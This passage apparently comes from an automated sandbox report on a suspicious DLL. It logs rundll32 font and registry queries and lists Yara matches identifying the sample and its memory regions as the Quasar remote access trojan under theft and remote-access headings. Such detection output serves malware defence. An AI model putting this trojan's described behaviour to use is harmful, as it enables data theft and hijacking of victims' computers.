                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\vstdlib_s64.dll.dll VolumeInformation
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\vstdlib_s64.dll.dll VolumeInformation
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\vstdlib_s64.dll.dll VolumeInformation
                        Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Yara detected Quasar RAT
                        Source: Yara matchFile source: vstdlib_s64.dll.dll, type: SAMPLE
                        Source: Yara matchFile source: 10.2.rundll32.exe.18eb8a10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.rundll32.exe.21a9fe10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.rundll32.exe.2371efb0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.rundll32.exe.17cca230000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rundll32.exe.1dbf6fc0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.rundll32.exe.168e3950000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.2.rundll32.exe.1da7abe0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.rundll32.exe.21ef74e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.rundll32.exe.1ab44df0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.rundll32.exe.1d941d40000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.rundll32.exe.2113b830000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.2.rundll32.exe.1d6442d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.2.rundll32.exe.1b080df0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.rundll32.exe.20fedbb0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.rundll32.exe.1edd23b0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.rundll32.exe.13ffd190000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.rundll32.exe.2b1acfd0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000007.00000002.1808931782.000001AB44DF2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000002.3552909524.000001B080DF2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1702280446.0000017CCA232000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.1811295481.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.1812688068.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.1702356382.000002371EFB2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000002.1812477246.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.1813216176.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.1812687849.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000002.1811783648.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1808027443.0000018EB8A12000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000002.1805176816.00000168E3952000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1813780410.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.1729906045.0000013FFD192000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.1817877407.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.1703302239.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1814452255.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.1760309078.000001D941D42000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.1805367986.0000021A9FE12000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1703297864.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1806920256.0000021EF74E2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000002.1804504731.000001D6442D2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.1815878708.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000002.3557919127.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.1730594231.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.1803990209.0000020FEDBB2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1806280015.000002113B832000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.1808109707.000001DBF6FC2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000002.1812533280.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.1761110058.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000002.1805248245.000001DA7ABE2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1815867810.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.1804903406.000001EDD23B2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.1805370892.000002B1ACFD2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6220, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5824, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6956, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5052, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2500, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 3748, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6864, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Yara detected Quasar RAT
                        Source: Yara matchFile source: vstdlib_s64.dll.dll, type: SAMPLE
                        Source: Yara matchFile source: 10.2.rundll32.exe.18eb8a10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.rundll32.exe.21a9fe10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.rundll32.exe.2371efb0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.rundll32.exe.17cca230000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rundll32.exe.1dbf6fc0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.rundll32.exe.168e3950000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.2.rundll32.exe.1da7abe0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.rundll32.exe.21ef74e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.rundll32.exe.1ab44df0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.rundll32.exe.1d941d40000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.rundll32.exe.2113b830000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.2.rundll32.exe.1d6442d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.2.rundll32.exe.1b080df0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.rundll32.exe.20fedbb0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.rundll32.exe.1edd23b0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.rundll32.exe.13ffd190000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.rundll32.exe.2b1acfd0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.rundll32.exe.7ffdfb3a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000007.00000002.1808931782.000001AB44DF2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000002.3552909524.000001B080DF2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1702280446.0000017CCA232000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.1811295481.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.1812688068.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.1702356382.000002371EFB2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000002.1812477246.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.1813216176.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.1812687849.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000002.1811783648.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1808027443.0000018EB8A12000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000002.1805176816.00000168E3952000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.1813780410.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.1729906045.0000013FFD192000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.1817877407.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.1703302239.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1814452255.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.1760309078.000001D941D42000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
